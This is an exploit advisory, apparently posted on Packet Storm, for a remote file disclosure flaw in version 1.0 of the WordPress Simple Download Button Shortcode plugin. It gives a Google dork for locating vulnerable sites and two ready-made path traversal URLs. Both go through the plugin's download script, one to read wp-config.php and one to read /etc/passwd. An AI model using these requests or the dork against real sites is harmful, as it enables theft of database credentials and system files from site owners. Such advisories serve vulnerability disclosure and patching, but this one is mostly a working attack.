WordPress Simple Download Button Shortcode plugin version 1.0 suffers from a remote file disclosure vulnerability.
e4ea7bd25d10fdaf89c8e656cdfa5028c177aa91fd04a159e38b67fb23e04e98##################################################
# Description : Wordpress Plugins - Simple Download Button Shortcode
Remote File Disclosure Vulnerability
# Version : 1.0
# Link :
https://wordpress.org/extend/plugins/simple-download-button-shortcode/
# Plugins :
https://downloads.wordpress.org/plugin/simple-download-button-shortcode.1.0.0.zip
# Date : 30-05-2012
# Google Dork : inurl:/wp-content/plugins/simple-download-button-shortcode/
# Author : Sammy FORGIT - sam at opensyscom dot fr -
https://www.opensyscom.fr
##################################################
Exploit :
https://www.exemple.com/wordpress/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../wp-config.php
https://www.exemple.com/wordpress/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../../../../../etc/passwd
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed